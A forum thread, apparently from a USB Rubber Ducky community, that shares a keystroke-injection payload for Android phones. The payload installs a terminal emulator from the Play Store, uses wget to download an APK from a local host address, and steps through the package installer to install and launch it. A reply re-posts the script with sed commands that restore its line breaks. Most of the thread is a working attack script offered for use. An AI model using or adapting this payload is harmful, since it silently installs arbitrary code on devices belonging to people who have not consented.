Jump to content

[Payload] Install Android Terminal Emulator wget apk, Install and run

KoryusaiKun

By KoryusaiKun
in Classic USB Rubber Ducky

 Share

Recommended Posts

KoryusaiKun Newbie

KoryusaiKun

Posted
Posted (edited)

Hi Guys n' Girls,

Here's my first payload in a while. What it dose is it opens the Play Store, Search's for terminal emulator, installs it form the store, opens it. Now wgets a file ( I used kos's AntiGuard.apk hosted locally, its the apk i had to hand :) ) then takes you to the install wizard, installs it, then runs it. All in about 20 Seconds. :) It could be quicker, this should work on most devices 4.0 and above i have only tryed it on my Samsung galaxy note II N7100 running android v4.1.1. You may just have to tweek a few things. Like the download URL and the file URI.

Here is a demo as promised:

This script was very annoying solely because of launching the android install wizard. If you use it please say thanks.


REM ----------------------------------------------------
REM Terminal emulator wget install and run V1.0
REM Tested on Samsung Galaxy note II Android V4.1.1
REM Koryusai-Kun
REM ----------------------------------------------------
DELAY 3000
DELAY 100
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
ESCAPE
REM open google search
CTRL z
DELAY 1200
REM open play store
STRING play store
DELAY 1000
DOWN
DOWN
DOWN
DOWN
ENTER
DELAY 2000
REM Start Search for 'Terminal Emulator'
STRING t
DELAY 75
STRING e
DELAY 75
STRING r
DELAY 75
STRING m
DELAY 75
STRING i
DELAY 75
STRING n
DELAY 75
STRING a
DELAY 75
STRING l emulator
DELAY 500
ENTER
REM Select 'Terminal Emulator', Install and open
DELAY 1000
DOWN
DOWN
DELAY 50
ENTER
DELAY 300
DOWN
RIGHT
ENTER
DELAY 500
DOWN
DOWN
ENTER
DELAY 300
ENTER
DELAY 2000
DOWN
DOWN
RIGHT
ENTER
DELAY 800
REM Change Dir to /mnt/sdcard/
STRING cd ..
DELAY 50
ENTER
STRING cd ..
DELAY 50
ENTER
STRING cd mnt
DELAY 50
ENTER
STRING cd sdcard
DELAY 50
ENTER
DELAY 50
REM wget the file and open the android package install wizard
STRING wget http://192.168.1.103/AntiGuard.apk; am start -a android.intent.action.MAIN -n com.android.packageinstaller/.PackageInstallerActivity -d file:////mnt//sdcard//AntiGuard.apk
ENTER
REM Go through the install then open the application
DELAY 2500
DOWN
DELAY 200
DOWN
DELAY 200
ENTER
DELAY 1500
DOWN
DELAY 500
DOWN
DELAY 500
DOWN
DELAY 500
ENTER[/CODE]

Edited by KoryusaiKun
Link to comment
Share on other sites
overwraith Newbie

overwraith

Posted
Posted (edited)

I noticed that when we copy and paiste off this website all the newlines go missing. I have installed CYGWIN on my computer so It has the bash executables accessible on my command line. Here is a command to insert all the newlines back into the script on a Windows 7 CYGWIN system. Im not very used to coding in bash, so im sure there are better ways to code this.

C:\Users\UserName\Desktop>set var1="REM

-----------------------------------------

-----------REM Terminal emulator wget install and run V1.0REM Tested on Samsung

Galaxy note II Android V4.1.1REM Koryusai-KunREM

-------------------------------

---------------------DELAY 3000DELAY 100ESCAPEESCAPEESCAPEESCAPEESCAPEESCAPEREM

open google searchCTRL zDELAY 1200REM open play storeSTRING play storeDELAY

1000

DOWNDOWNDOWNDOWNENTERDELAY 2000REM Start Search for 'Terminal Emulator'STRING

tD

ELAY 75STRING eDELAY 75STRING rDELAY 75STRING mDELAY 75STRING iDELAY 75STRING

nD

ELAY 75STRING aDELAY 75STRING l emulatorDELAY 500ENTERREM Select 'Terminal

Emula

tor', Install and openDELAY 1000DOWNDOWNDELAY 50ENTERDELAY

300DOWNRIGHTENTERDELA

Y 500DOWNDOWNENTERDELAY 300ENTERDELAY 2000DOWNDOWNRIGHTENTERDELAY 800REM Change

Dir to /mnt/sdcard/STRING cd ..DELAY 50ENTERSTRING cd ..DELAY 50ENTERSTRING cd

m

ntDELAY 50ENTERSTRING cd sdcardDELAY 50ENTERDELAY 50REM wget the file and open

t

he android package install wizardSTRING wget

http://192.168.1.103/AntiGuard.apk;

am start -a android.intent.action.MAIN -n

com.android.packageinstaller/.Package

InstallerActivity -d file:////mnt//sdcard//AntiGuard.apkENTERREM Go through the

install then open the applicationDELAY 2500DOWNDELAY 200DOWNDELAY 200ENTERDELAY

1500DOWNDELAY 500DOWNDELAY 500DOWNDELAY 500ENTER"

C:\Users\UserName\Desktop>echo "var1"

C:\Users\UserName\Desktop>echo %var1% | sed -e "s/REM/\nREM/g" | sed -e "s/ESCAPE/\nESCAPE/g" | sed -e "s/DELAY/\nDELAY/g" | sed -e "s/STRING/\nSTRING/g" | sed -e "s/ENTER/\nENTER/g" | sed -e "s/DOWN/\nDOWN/g" | sed -e "s/UP/\nUP/g" | sed -e "s/RIGHT/\nRIGHT/g" | sed -e "s/LEFT/\nLEFT/g" | sed -e "s/CTRL/\nCTRL/g"

Edited by overwraith
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...